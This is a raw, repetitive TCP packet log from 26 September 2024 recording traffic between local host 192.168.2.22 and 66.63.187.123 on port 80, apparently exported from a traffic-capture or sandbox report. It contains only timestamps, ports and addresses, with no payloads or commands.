Sep 26, 2024 09:19:23.067013025 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070498943 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070514917 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070533037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070549011 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070554018 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070554972 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070568085 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070585012 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070586920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070586920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070600986 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070601940 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070619106 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070628881 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070643902 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070652008 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070666075 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070682049 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070698977 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070705891 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070719004 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070734978 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070738077 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070764065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070780993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070780993 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070794106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070796967 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070813894 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070816040 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070830107 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070832014 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070846081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070848942 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070866108 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070867062 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070883036 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070883036 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070899010 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070915937 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070919991 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070945978 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070955038 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070960999 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070977926 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.070982933 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.070998907 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071013927 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071018934 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071047068 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071047068 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071062088 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071078062 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071079016 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071099043 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071116924 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071121931 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071135044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071136951 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071155071 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071156979 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071167946 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071167946 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071178913 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071193933 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071197987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071209908 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071217060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071234941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071234941 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071252108 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071254015 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071268082 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071273088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071280003 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071293116 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071295977 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071310997 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071312904 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071329117 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071332932 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071345091 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071352959 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071372986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071374893 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071374893 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071399927 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071407080 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071409941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071429968 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071449041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071453094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071468115 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071468115 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071485043 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071489096 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071506023 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071508884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071521997 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071527004 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071547031 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071548939 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071564913 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071567059 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071580887 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071587086 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071598053 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071604967 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071623087 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071628094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071643114 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071643114 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071657896 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071664095 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071680069 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071698904 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071731091 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071751118 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071769953 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071772099 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071788073 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071790934 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071805000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071827888 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071876049 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071894884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071913004 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.071933985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071933985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.071945906 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072067022 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072087049 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072107077 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072114944 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072128057 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072129011 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072143078 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072149038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072165966 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072177887 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072208881 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072251081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072392941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072411060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072431087 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072438002 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072451115 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072451115 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072465897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072470903 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072487116 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072491884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072508097 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072535038 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072566986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072586060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072603941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072606087 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072622061 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072624922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072638035 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072644949 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072662115 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072679996 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072721958 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072767973 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072897911 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072918892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.072942972 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.072962046 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073085070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073106050 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073126078 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073129892 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073143005 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073144913 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073158026 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073168039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073179960 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073201895 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073265076 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073285103 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073306084 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073308945 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073321104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073327065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073337078 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073364019 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073458910 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073477983 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073497057 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073502064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073515892 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073515892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073530912 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073537111 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073554039 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073559046 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073568106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073592901 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073596954 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073612928 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073631048 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073633909 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073652029 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073653936 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073671103 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073674917 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073687077 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073693991 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073714018 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073717117 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073730946 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073734999 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.073754072 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.073771000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076288939 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076309919 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076328993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076344013 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076380968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076380968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076426983 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076446056 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076467037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076471090 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076484919 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076503038 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076616049 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076637030 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076654911 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076661110 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076673031 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076675892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076688051 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076695919 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076710939 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076725006 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076790094 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076811075 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076828957 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076834917 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076848984 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076849937 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076863050 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076869965 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076886892 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076894999 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076910019 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076916933 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076931000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076936007 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076951981 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076953888 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076967001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076975107 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.076991081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.076993942 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077007055 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077030897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077085972 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077311039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077330112 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077347040 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077357054 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077366114 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077370882 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077388048 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077389002 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077408075 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077411890 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077424049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077444077 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077493906 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077512980 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077533007 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077537060 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077548027 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077553034 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077562094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077574015 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077595949 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077608109 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077672005 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077691078 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077711105 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077714920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077728987 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077729940 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077744007 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077749968 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077764988 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077769995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077786922 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077790022 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077800035 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077809095 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077825069 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077827930 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077848911 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077848911 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077862024 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077871084 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.077883005 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077907085 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.077960014 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078210115 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078254938 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078389883 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078408957 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078429937 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078433990 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078447104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078449011 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078464985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078469038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078480005 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078489065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078500032 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078511000 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078521967 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078546047 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078608036 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078625917 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078644991 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078649044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078660965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078665972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078681946 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078695059 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078804970 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078828096 CEST	80	49161	66.63.187.123	192.168.2.22
